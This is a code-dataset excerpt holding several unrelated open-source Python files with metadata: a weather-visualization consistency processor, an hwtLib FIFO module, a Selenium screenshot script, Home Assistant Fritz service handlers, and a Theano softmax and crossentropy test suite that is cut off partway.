text stringlengths 4 1.02M | meta dict |
|---|---|
import math
class ConsistencyProcessor:
def __init__(self, candPos, levelNumber):
self.name = 'Consistency processor'
self.candPos = candPos
self.candNumber = len(self.candPos)
self.levelNumber = levelNumber
def updateLevelData(self, level, candStatus, gamma):
fL = [0 for x in range(self.levelNumber * self.candNumber)]
for i in range(self.levelNumber):
radius = pow(2, i + 1) / 2
for j in range(self.candNumber):
p = [0 for x in range(self.levelNumber + 1)]
q = [0 for x in range(self.levelNumber + 1)]
xp = self.candPos[j]['x']
yp = self.candPos[j]['y']
# construct lower level distribution
if (i == 0):
p[0] = 1
else:
for k in range(self.candNumber * self.levelNumber):
if (candStatus[i - 1][k] == 1):
levelIndex = k / self.candNumber
candIndex = k % self.candNumber
distance = math.sqrt(pow(self.candPos[candIndex]['x'] - xp, 2) + pow(self.candPos[candIndex]['y'] - yp, 2))
if (distance <= radius):
p[levelIndex] += 1
# construct upper level distribution
if (i == self.levelNumber - 1):
q[0] = 1
else:
for k in range(self.candNumber * self.levelNumber):
if (candStatus[i + 1][k] == 1):
levelIndex = k / self.candNumber
candIndex = k % self.candNumber
distance = math.sqrt(pow(self.candPos[candIndex]['x'] - xp, 2) + pow(self.candPos[candIndex]['y'] - yp, 2))
if (distance <= radius):
q[levelIndex] += 1
# update fl
tempFL = 0
sumCount = 0
for pIndex in range(len(p)):
for qIndex in range(len(q)):
if (qIndex >= pIndex):
tempFL += p[pIndex] * q[qIndex] * math.exp(-1 * gamma * abs(i - (pIndex + qIndex) / 2.0))
sumCount += p[pIndex] * q[qIndex]
if (sumCount != 0):
fL[i * self.candNumber + j] = tempFL / sumCount
return fL | {
"content_hash": "41c2c2a7a1b9743cfe935b23bdc6a8ad",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 135,
"avg_line_length": 47.528301886792455,
"alnum_prop": 0.43985708614529573,
"repo_name": "Edgar324/GeoVis",
"id": "a470e9d90db1190379d621c7c8fa32e9fa4c6721",
"size": "2519",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "weathervis/consistencyprocessor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "575838"
},
{
"name": "HTML",
"bytes": "26744"
},
{
"name": "JavaScript",
"bytes": "205687"
},
{
"name": "Python",
"bytes": "61645"
},
{
"name": "TypeScript",
"bytes": "76665"
}
],
"symlink_target": ""
} |
from typing import Optional, Tuple, Union
from hwt.interfaces.std import Signal, Rst, Rst_n, Clk
from hwtLib.handshaked.fifo import HandshakedFifo
from hwtLib.mem.fifoDrop import FifoDrop
class HandshakedFifoDrop(HandshakedFifo):
"""
Fifo for handsahaked interface which allows to discard/commit written data
:see: :class:`hwtLib.handshaked.fifo.HandshakedFifo`
and :class:`hwtLib.mem.fifoDrop.FifoDrop`
.. hwt-autodoc:: _example_HandshakedFifoDrop
"""
FIFO_CLS = FifoDrop
def _declr(self):
HandshakedFifo._declr(self)
self.dataIn_discard = Signal()
self.dataIn_commit = Signal()
def _impl(self, clk_rst: Optional[Tuple[
Tuple[Clk, Union[Rst, Rst_n]],
Tuple[Clk, Union[Rst, Rst_n]]]]=None):
super(HandshakedFifoDrop, self)._impl(clk_rst=clk_rst)
f = self.fifo
f.dataIn.commit(self.dataIn_commit)
f.dataIn.discard(self.dataIn_discard)
def _example_HandshakedFifoDrop():
from hwt.interfaces.std import Handshaked
u = HandshakedFifoDrop(Handshaked)
u.DEPTH = 8
u.DATA_WIDTH = 4
u.EXPORT_SIZE = True
u.EXPORT_SPACE = True
return u
if __name__ == "__main__":
from hwt.synthesizer.utils import to_rtl_str
u = _example_HandshakedFifoDrop()
print(to_rtl_str(u)) | {
"content_hash": "be7c759de88bac8b7220eacd16771de1",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 78,
"avg_line_length": 28.782608695652176,
"alnum_prop": 0.6669184290030211,
"repo_name": "Nic30/hwtLib",
"id": "81c8e3c7e1d4920c2b8296e759589d985cea4b4c",
"size": "1324",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hwtLib/handshaked/fifoDrop.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "41560"
},
{
"name": "Python",
"bytes": "2523349"
},
{
"name": "VHDL",
"bytes": "117346"
},
{
"name": "Verilog",
"bytes": "36444"
}
],
"symlink_target": ""
} |
"""Main project script."""
import logging
import os
import sys
import time
from selenium.common.exceptions import TimeoutException
# necessary to import from parent directory in non-PyCharm environment
sys.path.append('..')
import penguin
penguin.STATIC_RESOURCE_PATH = '../static'
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(message)s')
file_handler = logging.FileHandler('main.log')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
# necessary for chromedriver to find the emulated display
os.environ["DIPSLAY"] = ":8"
number_of_chrome_drivers = 5
number_of_websites = 10
if __name__ == "__main__":
logger.info('')
logger.info('Starting "simple_example" penguin client --->')
logger.info('==========================================================')
P = penguin.Penguin(chrome_count=number_of_chrome_drivers)
logger.debug('Created new Penguin with {} chrome drivers'.format(number_of_chrome_drivers))
# load websites from csv, by default uses latest available file
P.add_websites(0, number_of_websites)
logger.debug('Loaded {} websites'.format(number_of_websites))
# Decorator, used to define what the driver thread does, must take in the website list and driver object, must
# return whether to keep running and if the url timed out
@P.driver
def driver_functionality(websites, chrome, timeouts):
try:
url, name = websites.pop(0)
except IndexError:
# No more websites to load, False stops thread iteration
logger.info('Chrome driving thread returned empty website list.. closing thread.')
return False
try:
chrome.get(url)
except TimeoutException:
# Took too long to fetch website, save url and name in timeout
timeouts.append((url, name))
logger.warning('Timeout occurred for site (\'{}\',\'{}\'), appending to timeout list.'.format(url, name))
return True
chrome.save_screenshot('.temp/image/' + name + '.png')
logger.debug('Chrome driving thread saved a screenshot for \'{}\'.'.format(name))
return True
# defines what the image processing thread does,
# must return whether to keep going and length of files found in .temp
@P.image_handler
def image_handler_functionality():
try:
queue = os.listdir('.temp/image')
except OSError:
# .temp/image directory is gone, False stops thread iteration
logger.info('Image handler thread returned empty image directory.. closing thread.')
return False, 0
for current_file in queue:
input_path = '.temp/image/' + current_file
input_name = current_file.rstrip('.png')
output_path = 'data/' + input_name + '.dph'
penguin.imagefile_to_dphfile(input_path, input_name, output_path)
logger.debug('Image handler thread processed \'{}\' into \'{}\'.'.format(input_path, output_path))
os.remove(input_path)
time.sleep(.13)
return True, len(queue)
logger.info('Beginning client execution.')
elapsed_time = P.run()
logger.debug('Image handler thread finished with ' +
'a maximum processing queue length of {}.'.format(P.max_queue_length))
logger.info('Finished client execution in {:.2f} seconds'.format(elapsed_time))
P.save_timeouts('timeouts.csv')
| {
"content_hash": "d4033b500240ac3933e8be669afc49da",
"timestamp": "",
"source": "github",
"line_count": 96,
"max_line_length": 117,
"avg_line_length": 36.802083333333336,
"alnum_prop": 0.6453439003679592,
"repo_name": "tylerjohnhaden/penguin-website-colors",
"id": "2550b51199eb5b418c438c325f6d367c635f8ea5",
"size": "3552",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "project/main.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "31446"
},
{
"name": "Shell",
"bytes": "109"
}
],
"symlink_target": ""
} |
"""Services for Fritz integration."""
from __future__ import annotations
import logging
import voluptuous as vol
from homeassistant.config_entries import ConfigEntryState
from homeassistant.core import HomeAssistant, ServiceCall
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers.service import async_extract_config_entry_ids
from .common import AvmWrapper
from .const import (
DOMAIN,
FRITZ_SERVICES,
SERVICE_CLEANUP,
SERVICE_REBOOT,
SERVICE_RECONNECT,
SERVICE_SET_GUEST_WIFI_PW,
)
_LOGGER = logging.getLogger(__name__)
SERVICE_SCHEMA_SET_GUEST_WIFI_PW = vol.Schema(
{
vol.Required("device_id"): str,
vol.Optional("password"): vol.Length(min=8, max=63),
vol.Optional("length"): vol.Range(min=8, max=63),
}
)
SERVICE_LIST: list[tuple[str, vol.Schema | None]] = [
(SERVICE_CLEANUP, None),
(SERVICE_REBOOT, None),
(SERVICE_RECONNECT, None),
(SERVICE_SET_GUEST_WIFI_PW, SERVICE_SCHEMA_SET_GUEST_WIFI_PW),
]
async def async_setup_services(hass: HomeAssistant) -> None:
"""Set up services for Fritz integration."""
for service, _ in SERVICE_LIST:
if hass.services.has_service(DOMAIN, service):
return
async def async_call_fritz_service(service_call: ServiceCall) -> None:
"""Call correct Fritz service."""
if not (
fritzbox_entry_ids := await _async_get_configured_avm_device(
hass, service_call
)
):
raise HomeAssistantError(
f"Failed to call service '{service_call.service}'. Config entry for target not found"
)
for entry_id in fritzbox_entry_ids:
_LOGGER.debug("Executing service %s", service_call.service)
avm_wrapper: AvmWrapper = hass.data[DOMAIN][entry_id]
if config_entry := hass.config_entries.async_get_entry(entry_id):
await avm_wrapper.service_fritzbox(service_call, config_entry)
else:
_LOGGER.error(
"Executing service %s failed, no config entry found",
service_call.service,
)
for service, schema in SERVICE_LIST:
hass.services.async_register(DOMAIN, service, async_call_fritz_service, schema)
async def _async_get_configured_avm_device(
hass: HomeAssistant, service_call: ServiceCall
) -> list:
"""Get FritzBoxTools class from config entry."""
list_entry_id: list = []
for entry_id in await async_extract_config_entry_ids(hass, service_call):
config_entry = hass.config_entries.async_get_entry(entry_id)
if (
config_entry
and config_entry.domain == DOMAIN
and config_entry.state == ConfigEntryState.LOADED
):
list_entry_id.append(entry_id)
return list_entry_id
async def async_unload_services(hass: HomeAssistant) -> None:
"""Unload services for Fritz integration."""
if not hass.data.get(FRITZ_SERVICES):
return
hass.data[FRITZ_SERVICES] = False
for service, _ in SERVICE_LIST:
hass.services.async_remove(DOMAIN, service)
| {
"content_hash": "c20d69b5391961f0699cd084bc39a26b",
"timestamp": "",
"source": "github",
"line_count": 101,
"max_line_length": 101,
"avg_line_length": 31.455445544554454,
"alnum_prop": 0.6436890147938307,
"repo_name": "rohitranjan1991/home-assistant",
"id": "c4e7de8df5e8d47fdc737b669301c6b1566f6907",
"size": "3177",
"binary": false,
"copies": "6",
"ref": "refs/heads/dev",
"path": "homeassistant/components/fritz/services.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1017265"
},
{
"name": "Python",
"bytes": "1051086"
},
{
"name": "Shell",
"bytes": "3946"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import unittest
import numpy
from nose.plugins.skip import SkipTest
from six.moves import xrange
import theano
from theano import config
from theano import tensor as T
from theano import tensor
from theano import gof
from theano.tests import unittest_tools as utt
from theano import printing
from theano.tensor.nnet import (categorical_crossentropy,
crossentropy_categorical_1hot,
crossentropy_softmax_1hot,
crossentropy_softmax_1hot_with_bias,
crossentropy_softmax_1hot_with_bias_dx,
crossentropy_softmax_argmax_1hot_with_bias,
CrossentropySoftmax1HotWithBiasDx,
CrossentropySoftmaxArgmax1HotWithBias,
CrossentropyCategorical1Hot,
CrossentropyCategorical1HotGrad,
sigmoid, softplus, Softmax, softmax,
softmax_op, softmax_graph, SoftmaxWithBias,
softmax_with_bias, LogSoftmax, logsoftmax_op,
softmax_grad, SoftmaxGrad,
Prepend_scalar_constant_to_each_row,
Prepend_scalar_to_each_row,
relu,
h_softmax,
elu)
from theano.tensor import matrix, vector, lvector, scalar
class T_sigmoid(unittest.TestCase):
def setUp(self):
utt.seed_rng()
def test_elemwise(self):
utt.verify_grad(sigmoid, [numpy.random.rand(3, 4)])
class T_softplus(unittest.TestCase):
def setUp(self):
utt.seed_rng()
def test_elemwise(self):
utt.verify_grad(softplus, [numpy.random.rand(3, 4)])
class T_Softmax(utt.InferShapeTester):
def test0(self):
def f(a):
return softmax_op(a)[:, 0]
utt.verify_grad(f, [numpy.random.rand(3, 4)])
def test1(self):
def f(a):
return softmax_op(a)[:, 1]
utt.verify_grad(f, [numpy.random.rand(3, 4)])
def test2(self):
def f(a):
return softmax_op(a)[:, 2]
utt.verify_grad(f, [numpy.random.rand(3, 4)])
def test3(self):
def f(a):
return softmax_op(a)[:, 3]
utt.verify_grad(f, [numpy.random.rand(3, 4)])
def test_infer_shape(self):
admat = matrix()
admat_val = numpy.random.rand(3, 4).astype(config.floatX)
self._compile_and_check([admat], [Softmax()(admat)],
[admat_val], Softmax)
def test_vector(self):
x = T.vector()
f = theano.function([x], softmax_op(x))
xv = numpy.random.randn(6).astype(config.floatX)
assert numpy.allclose(f(xv), numpy.exp(xv) / numpy.exp(xv).sum())
def test_vector_grad(self):
def f(a):
return softmax_op(a)
utt.verify_grad(f, [numpy.random.rand(4)])
class T_SoftmaxWithBias(utt.InferShapeTester):
def test0(self):
def f(a, b):
return softmax_with_bias(a, b)[:, 0]
utt.verify_grad(f, [numpy.random.rand(3, 4),
numpy.random.rand(4)])
def test1(self):
def f(a, b):
return softmax_with_bias(a, b)[:, 1]
utt.verify_grad(f, [numpy.random.rand(3, 4),
numpy.random.rand(4)])
def test2(self):
def f(a, b):
return softmax_with_bias(a, b)[:, 2]
utt.verify_grad(f, [numpy.random.rand(3, 4),
numpy.random.rand(4)])
def test3(self):
def f(a, b):
return softmax_with_bias(a, b)[:, 3]
utt.verify_grad(f, [numpy.random.rand(3, 4),
numpy.random.rand(4)])
def test_broadcast(self):
# test that we don't raise an error during optimization for no good
# reason as softmax_with_bias don't support correctly some/all
# broadcasted inputs pattern
initial_W = numpy.asarray([[0.1, 0.1, 0.1],
[0.1, 0.1, 0.1],
[0.1, 0.1, 0.1]],
dtype=theano.config.floatX)
W = theano.shared(value=initial_W, name='W')
vbias = theano.shared(value=0.1, name='vbias') # 0.01
hid = T.vector('hid')
f = theano.function([hid],
T.nnet.softmax_op(T.dot(hid, W.T) + vbias))
ops = [node.op for node in f.maker.fgraph.toposort()]
assert softmax_with_bias not in ops
assert softmax_op in ops
f([0, 1, 0])
# print f.maker.fgraph.toposort()
def test_softmax_with_bias_trace(self):
a = theano.shared(
numpy.random.randn(3).astype(config.floatX))
b = theano.shared(numpy.float32(numpy.random.randn()))
sm = T.nnet.softmax(a + b)
f = theano.function([], sm)
self.assertTrue(hasattr(f.maker.fgraph.outputs[0].tag, 'trace'))
print('f.maker.fgraph.outputs[0]: {0}'.format(f.maker.fgraph.outputs[0], ))
def test_infer_shape(self):
admat = matrix()
advec = vector()
admat_val = numpy.random.rand(3, 4).astype(config.floatX)
advec_val = numpy.random.rand(4).astype(config.floatX)
self._compile_and_check([admat, advec],
[SoftmaxWithBias()(admat, advec)],
[admat_val, advec_val], SoftmaxWithBias)
class T_LogSoftmax(utt.InferShapeTester):
def test0(self):
def f(a):
return logsoftmax_op(a)[:, 0]
utt.verify_grad(f, [numpy.random.rand(3, 4)])
def test1(self):
def f(a):
return logsoftmax_op(a)[:, 1]
utt.verify_grad(f, [numpy.random.rand(3, 4)])
def test2(self):
def f(a):
return logsoftmax_op(a)[:, 2]
utt.verify_grad(f, [numpy.random.rand(3, 4)])
def test3(self):
def f(a):
return logsoftmax_op(a)[:, 3]
utt.verify_grad(f, [numpy.random.rand(3, 4)])
def test_matrix(self):
def f(a):
return logsoftmax_op(a)
utt.verify_grad(f, [numpy.random.rand(3, 4)])
def test_vector(self):
x = T.vector()
f = theano.function([x], logsoftmax_op(x))
xv = numpy.random.randn(6).astype(config.floatX)
assert numpy.allclose(f(xv),
numpy.log(numpy.exp(xv) / numpy.exp(xv).sum()))
def test_vector_grad(self):
def f(a):
return logsoftmax_op(a)
utt.verify_grad(f, [numpy.random.rand(4)])
def test_allclose(self):
m = theano.config.mode
m = theano.compile.get_mode(m)
m.check_isfinite = False
x, y = tensor.matrices('xy')
# regular softmax and crossentropy
sm = tensor.nnet.softmax(x)
cm = tensor.nnet.categorical_crossentropy(sm, y)
# numerically stable log-softmax with crossentropy
logsm = tensor.nnet.logsoftmax(x)
sm2 = tensor.exp(logsm) # just used to show equivalence with sm
cm2 = -tensor.sum(y * logsm, axis=1)
grad = tensor.grad(cm2.mean(), x)
# create some inputs into a softmax that are large and labels
a = numpy.exp(10 * numpy.random.rand(5, 10).astype(theano.config.floatX))
# create some one-hot coded labels
b = numpy.eye(5, 10).astype(theano.config.floatX)
# show equivalence of softmax and exponentiated numerically stable
# log-softmax
f1 = theano.function([x], [sm, sm2])
sm_, sm2_ = f1(a)
utt.assert_allclose(sm_, sm2_)
# now show that the two versions result in the same crossentropy cost
# this indicates that the forward function does provide some numerical
# stability
f2 = theano.function([x, y], [cm, cm2], mode=m)
cm_, cm2_ = f2(a, b)
utt.assert_allclose(cm_, cm2_)
# now, show that in the standard softmax case the gradients blow up
# while in the log-softmax case they don't
f3 = theano.function([x, y], [grad])
grad_ = f3(a, b)
assert numpy.all(numpy.isnan(grad_) == False)
def test_isclose(self):
def f(a):
return logsoftmax_op(a)
def test_local_softmax_optimization(self):
"""Test the Logsoftmax substitution
Check that Log(Softmax(x)) is substituted with Logsoftmax(x). Note that
only the forward pass is checked (i.e., doesn't check the gradient)
"""
x, y = tensor.matrices('xy')
sm = tensor.nnet.softmax(x)
logsm = tensor.log(sm)
f = theano.function([x], logsm)
self.assertTrue(hasattr(f.maker.fgraph.outputs[0].tag, 'trace'))
assert isinstance(f.maker.fgraph.outputs[0].owner.op,
theano.tensor.nnet.nnet.LogSoftmax)
def test_local_softmax_grad_optimization_and_big_input(self):
"""Test the Logsoftmax's grad substitution.
Check that Log(Softmax(x))'s grad is substituted with Logsoftmax(x)'s
grad and that the new operation does not explode for big inputs.
Note that only the grad is checked.
"""
m = theano.config.mode
m = theano.compile.get_mode(m)
m.check_isfinite = False
# some inputs that are large to make the gradient explode in the non
# optimized case
a = numpy.exp(10 * numpy.random.rand(5, 10).astype(theano.config.floatX))
def myfunc(x):
sm = tensor.nnet.softmax(x)
logsm = tensor.log(sm)
return logsm
# We set step to 0.1 because for big values we need a big epsilon
utt.verify_grad(myfunc, [a], eps=0.1, mode=m)
f = theano.function([], myfunc(a))
self.assertTrue(hasattr(f.maker.fgraph.outputs[0].tag, 'trace'))
class T_SoftmaxGrad(utt.InferShapeTester):
def test_infer_shape(self):
admat = matrix()
bdmat = matrix()
admat_val = numpy.random.rand(3, 4).astype(config.floatX)
bdmat_val = numpy.random.rand(3, 4).astype(config.floatX)
self._compile_and_check([admat, bdmat], [SoftmaxGrad()(admat, bdmat)],
[admat_val, bdmat_val], SoftmaxGrad)
class T_CrossentropySoftmax1Hot(unittest.TestCase):
def setUp(self):
utt.seed_rng()
def test0(self):
y_idx = [0, 1, 3]
def f(a, b):
return crossentropy_softmax_1hot_with_bias(a, b, y_idx)[0]
utt.verify_grad(f, [numpy.random.rand(3, 4),
numpy.random.rand(4)])
def test1(self):
y_idx = [0, 1, 3]
def f(a):
return crossentropy_softmax_1hot(a, y_idx)[0]
utt.verify_grad(f, [numpy.random.rand(3, 4)])
def test_vector(self):
y_idx = [3]
def f(a):
return crossentropy_softmax_1hot(T.shape_padleft(a), y_idx)[0]
utt.verify_grad(f, [numpy.random.rand(4)])
def test_vectors(self):
y_idx = [3]
def f(a, b):
return crossentropy_softmax_1hot(T.shape_padleft(a) + b, y_idx)[0]
utt.verify_grad(f, [numpy.random.rand(4), numpy.random.rand(4)])
class T_CrossentropySoftmax1HotWithBiasDx(utt.InferShapeTester):
def test0(self):
def ff(class_dtype):
def f(sm):
# Class indices
y = numpy.random.randint(low=0, high=5, size=10).astype(class_dtype)
return theano.tensor.nnet.crossentropy_softmax_1hot_with_bias_dx(
numpy.random.rand(10), # Gradient w.r.t. NLL.
sm, # Softmax output.
y)
return f
# Build a random softmax output whose rows sum to 1.
softmax_output = numpy.random.rand(10, 5)
softmax_output /= softmax_output.sum(axis=1).reshape(10, 1)
for dtype in ['uint8', 'int8', 'uint64', 'int64']:
utt.verify_grad(ff(dtype), [softmax_output])
def test1(self):
rng = numpy.random.RandomState(utt.fetch_seed())
softmax_output = rng.rand(10, 5)
softmax_output /= softmax_output.sum(axis=1).reshape(10, 1)
def f(dy):
return (theano.tensor.nnet.crossentropy_softmax_1hot_with_bias_dx(
dy,
softmax_output,
rng.randint(low=0, high=5, size=10)))
utt.verify_grad(f, [rng.rand(10)])
def test_infer_shape(self):
admat = matrix()
advec = vector()
alvec = lvector()
rng = numpy.random.RandomState(utt.fetch_seed())
admat_val = rng.rand(10, 5).astype(config.floatX)
admat_val /= admat_val.sum(axis=1).reshape(10, 1)
advec_val = rng.rand(10).astype(config.floatX)
alvec_val = rng.randint(low=0, high=5, size=10)
self._compile_and_check([advec, admat, alvec],
[CrossentropySoftmax1HotWithBiasDx()(advec, admat, alvec)],
[advec_val, admat_val, alvec_val],
CrossentropySoftmax1HotWithBiasDx)
def test_neg_idx(self):
admat = matrix()
advec = vector()
alvec = lvector()
rng = numpy.random.RandomState(utt.fetch_seed())
admat_val = rng.rand(10, 5).astype(config.floatX)
admat_val /= admat_val.sum(axis=1).reshape(10, 1)
advec_val = rng.rand(10).astype(config.floatX)
alvec_val = rng.randint(low=0, high=5, size=10)
alvec_val[1] = -1
out = CrossentropySoftmax1HotWithBiasDx()(advec, admat, alvec)
f = theano.function([advec, admat, alvec], out)
self.assertRaises(ValueError, f, advec_val, admat_val, alvec_val)
class T_CrossentropySoftmaxArgmax1HotWithBias(utt.InferShapeTester):
def setUp(self):
super(T_CrossentropySoftmaxArgmax1HotWithBias, self).setUp()
self.op = theano.tensor.nnet.crossentropy_softmax_argmax_1hot_with_bias
def test0(self):
n_classes = 5
n_samples = 3
# First test gradient when getting a gradient on the NLL output.
def grad_on_nll_dtype(dtype):
def grad_on_nll(x, b):
y_idx = numpy.random.randint(low=0, high=n_classes, size=n_samples).astype(dtype)
return self.op(x, b, y_idx=y_idx)[0]
return grad_on_nll
for dtype in ['uint8', 'int8', 'uint64', 'int64']:
utt.verify_grad(grad_on_nll_dtype(dtype),
[numpy.random.rand(n_samples, n_classes),
numpy.random.rand(n_classes)])
# Then test gradient when getting a gradient on the softmax output.
def grad_on_softmax(x, b):
return self.op(x, b, y_idx=numpy.random.randint(
low=0, high=n_classes, size=n_samples))[1]
utt.verify_grad(grad_on_softmax,
[numpy.random.rand(n_samples, n_classes),
numpy.random.rand(n_classes)])
def test_infer_shape(self):
admat = matrix()
advec = vector()
alvec = lvector()
rng = numpy.random.RandomState(utt.fetch_seed())
admat_val = rng.rand(3, 5).astype(config.floatX)
advec_val = rng.rand(5).astype(config.floatX)
alvec_val = rng.randint(low=0, high=5, size=3)
self._compile_and_check([admat, advec, alvec],
CrossentropySoftmaxArgmax1HotWithBias()(admat, advec, alvec),
[admat_val, advec_val, alvec_val],
CrossentropySoftmaxArgmax1HotWithBias)
def test_neg_idx(self):
admat = matrix()
advec = vector()
alvec = lvector()
rng = numpy.random.RandomState(utt.fetch_seed())
admat_val = rng.rand(3, 5).astype(config.floatX)
advec_val = rng.rand(5).astype(config.floatX)
alvec_val = rng.randint(low=0, high=5, size=3)
alvec_val[1] = -1
out = CrossentropySoftmaxArgmax1HotWithBias()(admat, advec, alvec)
f = theano.function([admat, advec, alvec], out)
self.assertRaises(ValueError, f, admat_val, advec_val, alvec_val)
class T_prepend(utt.InferShapeTester):
def test0(self):
x = tensor.matrix('x')
y = Prepend_scalar_constant_to_each_row(4.)(x)
f = theano.function([x], y)
m = numpy.random.rand(3, 5).astype(config.floatX)
my = f(m)
self.assertTrue(my.shape == (3, 6), my.shape)
self.assertTrue(numpy.all(my[:, 0] == 4.0))
def test1(self):
"basic functionality"
x = tensor.matrix('x')
y = Prepend_scalar_to_each_row()(5., x)
f = theano.function([x], y)
m = numpy.ones((3, 5), dtype="float32")
my = f(m)
self.assertTrue(my.shape == (3, 6))
self.assertTrue(numpy.all(my[:, 0] == 5.0))
def test_infer_shape(self):
admat = matrix()
adscal = scalar()
rng = numpy.random.RandomState(utt.fetch_seed())
admat_val = rng.rand(3, 5).astype(config.floatX)
adscal_val = numpy.asarray(rng.rand(), dtype=config.floatX).item()
self._compile_and_check([admat],
[Prepend_scalar_constant_to_each_row(adscal_val)(admat)],
[admat_val],
Prepend_scalar_constant_to_each_row)
self._compile_and_check([adscal, admat],
[Prepend_scalar_to_each_row()(adscal, admat)],
[adscal_val, admat_val],
Prepend_scalar_to_each_row)
class T_CrossentropyCategorical1HotGrad(utt.InferShapeTester):
def test_infer_shape(self):
advec = vector()
admat = matrix()
alvec = lvector()
rng = numpy.random.RandomState(utt.fetch_seed())
advec_val = rng.rand(3).astype(config.floatX)
admat_val = rng.rand(3, 2).astype(config.floatX)
alvec_val = [0, 1, 0]
self._compile_and_check([advec, admat, alvec],
[CrossentropyCategorical1HotGrad()(advec, admat, alvec)],
[advec_val, admat_val, alvec_val],
CrossentropyCategorical1HotGrad)
class T_CrossentropyCategorical1Hot(utt.InferShapeTester):
def test_grad(self):
x = tensor.matrix('x')
one_of_n = tensor.lvector('one_of_n')
op = crossentropy_categorical_1hot
xe = op(x, one_of_n)
f = theano.function([x, one_of_n], xe)
x_val = numpy.asarray([[.4, .6, .0], [.1, .8, .1]],
dtype=config.floatX)
xe_val = f(x_val, [0, 1])
assert numpy.allclose(xe_val, -numpy.log([.4, .8]))
def oplike(x):
return op(x, [0, 1])
tensor.verify_grad(oplike, [x_val], rng=numpy.random)
def test_infer_shape(self):
admat = matrix()
alvec = lvector()
rng = numpy.random.RandomState(utt.fetch_seed())
admat_val = rng.rand(3, 2).astype(config.floatX)
alvec_val = [0, 1, 0]
self._compile_and_check([admat, alvec],
[CrossentropyCategorical1Hot()(admat, alvec)],
[admat_val, alvec_val],
CrossentropyCategorical1Hot)
def test_softmax_optimizations(self):
x = tensor.matrix('x')
one_of_n = tensor.lvector('one_of_n')
op = crossentropy_categorical_1hot
xe = op(x, one_of_n)
fgraph = gof.FunctionGraph(
[x, one_of_n],
[op(softmax_op(x), one_of_n)])
assert fgraph.outputs[0].owner.op == op
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
assert str(fgraph.outputs[0].owner.op) == 'OutputGuard'
assert (fgraph.outputs[0].owner.inputs[0].owner.op ==
crossentropy_softmax_argmax_1hot_with_bias)
def test_softmax_optimizations_vector(self):
x = tensor.vector('x')
one_of_n = tensor.lvector('one_of_n')
op = crossentropy_categorical_1hot
fgraph = gof.FunctionGraph(
[x, one_of_n],
[op(softmax_op(x), one_of_n)])
assert fgraph.outputs[0].owner.op == op
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
assert str(fgraph.outputs[0].owner.op) == 'OutputGuard'
assert (fgraph.outputs[0].owner.inputs[0].owner.op ==
crossentropy_softmax_argmax_1hot_with_bias)
def test_softmax_optimizations_w_bias(self):
x = tensor.matrix('x')
b = tensor.vector('b')
one_of_n = tensor.lvector('one_of_n')
op = crossentropy_categorical_1hot
xe = op(x, one_of_n)
fgraph = gof.FunctionGraph(
[x, b, one_of_n],
[op(softmax_op(x + b), one_of_n)])
assert fgraph.outputs[0].owner.op == op
# print 'BEFORE'
# for node in fgraph.toposort():
# print node.op
# print printing.pprint(node.outputs[0])
# print '----'
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
# print 'AFTER'
# for node in fgraph.toposort():
# print node.op
# print printing.pprint(node.outputs[0])
# print '===='
assert len(fgraph.toposort()) == 2
assert str(fgraph.outputs[0].owner.op) == 'OutputGuard'
assert (fgraph.outputs[0].owner.inputs[0].owner.op ==
crossentropy_softmax_argmax_1hot_with_bias)
def test_softmax_optimizations_w_bias2(self):
x = tensor.matrix('x')
b = tensor.vector('b')
c = tensor.vector('c')
one_of_n = tensor.lvector('one_of_n')
op = crossentropy_categorical_1hot
fgraph = gof.FunctionGraph(
[x, b, c, one_of_n],
[op(softmax_op(T.add(x, b, c)), one_of_n)])
assert fgraph.outputs[0].owner.op == op
# print 'BEFORE'
# for node in fgraph.toposort():
# print node.op
# print '----'
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
# print 'AFTER'
# for node in fgraph.toposort():
# print node.op
# print '===='
assert len(fgraph.toposort()) == 3
assert str(fgraph.outputs[0].owner.op) == 'OutputGuard'
assert (fgraph.outputs[0].owner.inputs[0].owner.op ==
crossentropy_softmax_argmax_1hot_with_bias)
def test_softmax_optimizations_w_bias_vector(self):
x = tensor.vector('x')
b = tensor.vector('b')
one_of_n = tensor.lvector('one_of_n')
op = crossentropy_categorical_1hot
fgraph = gof.FunctionGraph(
[x, b, one_of_n],
[op(softmax_op(x + b), one_of_n)])
assert fgraph.outputs[0].owner.op == op
# print 'BEFORE'
# for node in fgraph.toposort():
# print node.op
# print printing.pprint(node.outputs[0])
# print '----'
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
# print 'AFTER'
# for node in fgraph.toposort():
# print node.op
# print '===='
assert len(fgraph.toposort()) == 3
assert str(fgraph.outputs[0].owner.op) == 'OutputGuard'
assert (fgraph.outputs[0].owner.inputs[0].owner.op ==
crossentropy_softmax_argmax_1hot_with_bias)
def test_softmax_grad_optimizations(self):
x = tensor.matrix('x')
one_of_n = tensor.lvector('one_of_n')
op = crossentropy_categorical_1hot
xe = op(softmax_op(x), one_of_n)
sum_xe = tensor.sum(xe)
g_x = tensor.grad(sum_xe, x)
fgraph = gof.FunctionGraph(
[x, one_of_n],
[g_x])
self.assertTrue(hasattr(fgraph.outputs[0].tag, 'trace'))
# print 'BEFORE'
# for node in fgraph.toposort():
# print node.op, node.inputs
# print '----'
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
# print 'AFTER'
# for node in fgraph.toposort():
# print node.op, node.inputs
has_cx1hot = False
